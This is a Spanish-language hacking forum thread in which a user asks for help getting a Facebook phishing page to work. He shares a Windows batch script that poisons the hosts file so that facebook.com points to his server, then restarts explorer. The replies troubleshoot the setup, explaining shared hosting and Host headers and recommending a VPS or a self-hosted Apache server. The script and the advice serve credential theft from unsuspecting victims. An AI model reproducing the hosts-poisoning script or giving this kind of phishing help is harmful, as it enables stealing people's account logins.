Problemas con redireccion

Iniciado por DarkXploitz, Febrero 20, 2016, 09:47:59 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Hola mis hermanos en el hack paso x aqui porque tengo problemas para redireccionar un phising que hice, los cambios al host los hago con un .bat el cual si hace los cambios pero no me redirecciona, lo tengo alojado en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y supuestamente esta es la ip de mi web 31.170.160.102 el host queda asi 31.170.160.102 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero no redirecciona, lo curioso es que al hacer ping a mi web    ftp2016.comlu.com  me sale es la ip de facebook y no esta 31.170.160.102 que se supone es la mia, que estoy haciendo mal  :'( les agraesco su ayuda

aqui esta alojada la web si quieren pueden probarla
ftp2016.comlu.com

les dejo el codigo .bat que uso

Código: dos

@echo off
echo 31.170.160.102 facebook.com >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses

Hola,

No tenes que pones la IP, tenes que poner el dominio tuyo directamente.
El tema esta en que 000webhost es una especie de shared host y colocando la IP sola no basta para que redireccione.

Saludos!
ANTRAX


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola,

No tenes que pones la IP, tenes que poner el dominio tuyo directamente.
El tema esta en que 000webhost es una especie de shared host y colocando la IP sola no basta para que redireccione.

Saludos!
ANTRAX

ya lo hice puse mi dominio y si se cambia pero igual no redirecciona, que host gratuito me recomendarias e investigado un poco sobre los host vps pero habro cuentas y despues no se que hacer xq no me sale dnd public_html ni nada x el estilo
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ya lo hice puse mi dominio y si se cambia pero igual no redirecciona, que host gratuito me recomendarias e investigado un poco sobre los host vps pero habro cuentas y despues no se que hacer xq no me sale dnd public_html ni nada x el estilo

¿Solucionaste el tema?

Yo te recomiendo hostinger como hosting gratuito.
Lo pruebas y nos comentas si lo acabas solucionando.

Cuando entras a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, tu navegador se conecta a 104.28.16.98 y le manda "Host: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"
De esa forma, si la web esta en un hosting compartido, el servidor sabe a que web queres entrar. Si mandas un dominio que no existe en la cabecera host, te va a mostrar una pagina default (podes probar).

El archivo hosts es para asociar un dominio a una ip y saltearte la resolucion por dns. Podes hacer que el navegador, al querer conectarse a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, entre a otra ip que vos quieras, pero no podes cambiar el host que va a mandar. Tenes que configurar tu servidor para que responda cuando le llega una peticion para No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y eso no lo vas a poder hacer con un hosting gratuito. Podes usar un vps (fijate en lowendbox) o tu propia computadora (instala un apache y abri los puertos en el router como si fuera un troyano)